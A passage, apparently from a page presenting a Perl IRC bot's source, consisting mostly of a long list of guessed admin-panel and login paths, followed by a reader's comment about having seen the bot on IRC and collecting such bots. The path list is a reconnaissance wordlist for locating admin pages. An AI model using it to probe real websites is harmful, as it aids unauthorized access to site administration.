login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/log.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',504: 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',505: 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',506: 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',507: 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',508: 
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','log.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin1.php','admin1.html','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','ccms/','ccms/login.php','ccms/index.php','maintenance/','webmaster/','adm/','configuration/','configure/','websvn/','admin/','admin/account.php','admin/account.html'. 'admin/index.php','admin/index.html','admin/login.php'. 'admin/login.html','admin/log.php','admin/controlpanel.html','admin/controlpanel.php','admin.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/index.php','administrator/login.html','administrator/login.php','administrator/account.html','administrator/account.php','administrator.php','administrator.html','login.php','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.ht
yeah, I was able to encounter this IRC bot in IRC too. I think this was coded by nobody/ander from Indonesia based on the code. Btw, nice collection of Perl IRC bots.. I also have some collections here at home.
-shipcode of theprojecxblog.net